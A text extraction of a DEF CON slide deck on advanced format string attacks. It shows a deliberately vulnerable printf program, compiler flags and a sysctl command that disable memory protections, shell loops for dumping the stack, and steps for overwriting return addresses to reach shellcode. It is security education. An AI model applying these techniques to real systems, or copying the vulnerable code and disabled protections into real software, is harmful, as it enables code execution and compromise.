advanced format string attacks - def con® hacking conference
TRANSCRIPT
![Page 1: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/1.jpg)
Advanced Format String AttacksPresented by Paul Haas
![Page 2: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/2.jpg)
Contents
•Background
•Abstract
•Definition
•Context
•Technique
•How-to
•Tools
•Exploits
•Conclusion
•Q&A
![Page 3: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/3.jpg)
Background
•LeadWebApplicationSecurityEngineeratRedspin,Incwithover4yearsexperienceinhundredsofaudits.
•Thistalkisnotassociatedwithmycompany
•Defcon13CTFwinner(Shellphish2005)
•AlumniofUCSB’sComputerSecurityGroup
•MarioKartDS:RobinTankonRainbowRoad
![Page 4: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/4.jpg)
In
#include<stdio.h>
intmain(intargc,char**argv){
printf(argv[1]);
}
![Page 5: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/5.jpg)
Out
Readingarbitrarylocations
Writingarbitrarylocations
Executingarbitrarycode
Getashell
![Page 6: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/6.jpg)
Without
RTFMandWritingityourself!
![Page 7: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/7.jpg)
Format String Attack
•SoftwarevulnerabilityincertainCfunctionsthatperformstringformattingleadingtothepotentialtowritearbitrarydatatoarbitrarylocations
•Despiteeasysolutions,vulnerabilitiesandignoranceofissuestillexist,hencethetalk
•Commoninhackademicexercises
•Talkassumesyouhaveabasicideaoftheattack(%x,%s,%n)
•Talkdetailstechniquebuttoolsdonotrequireit
![Page 8: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/8.jpg)
Brief History
•1990:csh“InteractionEffect”crash:!o%8f
•1999-09-17:proftpd1.2.0pre6“Argumentattack/snprintfVulnerability”(BID650)
•2000-06-22:wu-ftpd2.6.0RemoteFormatStringStackOverwriteVulnerability(BID1387)
•2000-09-09:“FormatStringAttacks”whitepaperbyTimNewsham
•2010-06-30:KVIrcDCCDirectoryTraversalandMultipleFormatStringVulnerabilities(BID40746)
![Page 9: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/9.jpg)
Old Technique
•Manualpoppingupofstackusingstringof‘%x’s
•Getoverwriteaddressusingothertechnique
•SearchforshellcodeincoreafterSEGFAULT
•Characterswrittenusinglongvaluein%xor%c
•Finalwritetoaddressusing%n
•FrequentRTFM
•Writeonce,useonce
![Page 10: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/10.jpg)
Current Technique
•%pgivesdetailedinformationofstacklocation
•%sallowsustoviewknownstackaddressesasstrings
•%NNccontrolsnumberofbyteswritten
•%hhnallowssinglebytewrites
•Directparameteraccessshortensformatstring: %5$n=%p%p%p%p%p%n
![Page 11: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/11.jpg)
New Technique
•FormatStringAttackallowsustodumpstack
•Stackcontainsinterestinginformation:
data,codepointers,stackaddresses
ourformatstring,formatstring’saddress
stackoffsetlocationofalloftheabove
•Knowledgeofthisgivesustheaddressofanyvalueonthestack
•Thesevaluesareenoughtowriteourexploit
![Page 12: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/12.jpg)
Our Vulnerable Code
#include<stdio.h>
intmain(intargc,char**argv){ printf(argv[1]);}#Compileandsetupinsecureenvironment
gccprintf.c-w-O0-ggdb-std=c99-static-D_FORTIFY_SOURCE=0-fno-pie-Wno-format-Wno-format-security-fno-stack-protector-znorelro-zexecstack-oprintf
sudosysctl-wkernel.randomize_va_space=0
![Page 13: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/13.jpg)
Exploit Steps
•Dumpstackvaluesuntilformatstringisfound
•Locatepointeraddressofformatstring
•Chooseouroverwriteaddressonthestack
•Pointformatstringatoverwriteaddressandwriteaddressofshellcodetoendofstring
•Adjustoffsetsfor‘chickenandegg’problem:
Addressofformatstringbasedonitslength
Formatstringneedsitsownaddresstoreference
![Page 14: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/14.jpg)
Stack Dump
•Method1:Passalongstringof%p’s
./printf`perl-E‘say“%p”x200’`
•Method2:Executebinaryinloopwith%NNN$p
foriin{001..200};doecho-n“$i=“;./printf “%$i\$p”;echo;done
•Searchforhexrepresentationofstring
$=0x24,%=0x25,p=0x70
•Resultwillbestackoffsetofformatstring
![Page 15: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/15.jpg)
Format String Address
•Executebinaryinloopwithsequential%NNN$s
WillcauseSEGFAULTS,maytripanyIDSsystems
foriin{001..100};doecho-n“$i=“;./printf “%$i\$p:%$i\$s”;echo;done|grep-v^$
•Createformatstringonlycomprisingofaddressesobtainedfromstackdump
Singleexecution/stringpreventsSEGFAULT
Muchmoreelegant,verifiesconstantstack
![Page 16: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/16.jpg)
Offset + Address = WIN
Matchingupanoffsettoastackaddressallowsustolearntheaddressofanylocationonthestack
Example:
Offset100(0xBFFFF100):Ourformatstring
sizeof(pointer)=4bytes*100pointers=400
Offset1=0xBFFFF100+400=0xBFFFF290
![Page 17: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/17.jpg)
Overwrite Location
•Commonexploitlocationsrequirebinaryexaminationtools:PLT,DTORS,LIBC
•Advanceformatstringattackcouldextractthesefromknownbinaryheaders(difficult)
•Returnaddressesarestoredonthestack
Weknowthestackaddressofeachvalue
•Overwritetheselocationstopointtoshellcode
![Page 18: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/18.jpg)
Issues
•Differentformatstringslengthseffectstackaddresses,yetweassumestackisconstant
Keepallstringstosamemodulusofsizeof(pointer)
•Formatstringmaynotalignwithstackaddress
Keeppaddingrequirementwhenaddressingstring
•Evenwiththecorrectmodulusandpad,ourstringoffsetmaybeoff
Verifyourexploitbeforeweattemptitbyreading ratherthanwritingtoouroverwritelocation
![Page 19: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/19.jpg)
Result
•Itispossibletocreateaformatstringexploitusingonly2executionsofthevulnerableprogramwithnoprogramexceptions
•Mathonly,nobruteforcingnecessary
•Incorporateshellcodeaspartofformatstring
•Smallerformatstringbuffersarealsopossible
8bytestoexamineastackaddress
Formatstringassmallas68bytes+shellcode
![Page 20: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/20.jpg)
Format String Auto Exploitation
•ProofofconcepttoolinPython
•InstructionsforrunningonBacktrack4
•Multipleexploitandoverwriteoptions
•Missingsomeusefulfeatures:
Separateexecutionofindependentsteps
Architecturesindependent(x86&64)
Readarbitrarylocationsratherthanwrite
Finercontroloverexploit
![Page 21: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/21.jpg)
Metasploit Integration
•Controleachstepoftheexploitindividuallyorautomateentireprocess
•Useaspayloadgenerator
•UsesMetasploitpayloadlibraryforshellcode
•Integratesintoothermodulesandinjectionfunctionality
•FunctionalitywillbedemonstratedduringDefcon
![Page 22: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/22.jpg)
Demonstrations
•TestingCode
•OverTheWire
•Knownexploit
•0-Day?
![Page 23: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/23.jpg)
Summary
•Theoutputfromformatstringattacksgivesyoueverythingyouneedtoknowtogofromdiscoverytocompromise
•Theexploitationprocesscanbeautomatedfromstarttofinish
•Formatstringattacksareeasytofix,andnowareeasytoexploitaswell
•Thereareplentyofvulnerableprogramsouttheretodiscoverandexploit
![Page 24: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/24.jpg)
Questions?
![Page 25: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/25.jpg)
Thanks
•Themostrecentversionofthispresentationandassociatedtoolscanbefoundonwww.redspin.comandwww.defcon.org
•LookfortheincorporationofthetoolsinthistalkinMetasploitinthenearfuture
•Anyfollow-upquestionscanbeaddressedtophaasATredspinDOTcom
•ShoutstotheShellphish,G.Vigna”zanardi”andtheGoatsatRedspin{ap3r,jhaddix,fulg0re,D3,OwNpile,Yimmy&b3tty}
![Page 26: Advanced Format String Attacks - DEF CON® Hacking Conference](https://reader036.vdocuments.mx/reader036/viewer/2022071601/613d3648736caf36b75aa574/html5/thumbnails/26.jpg)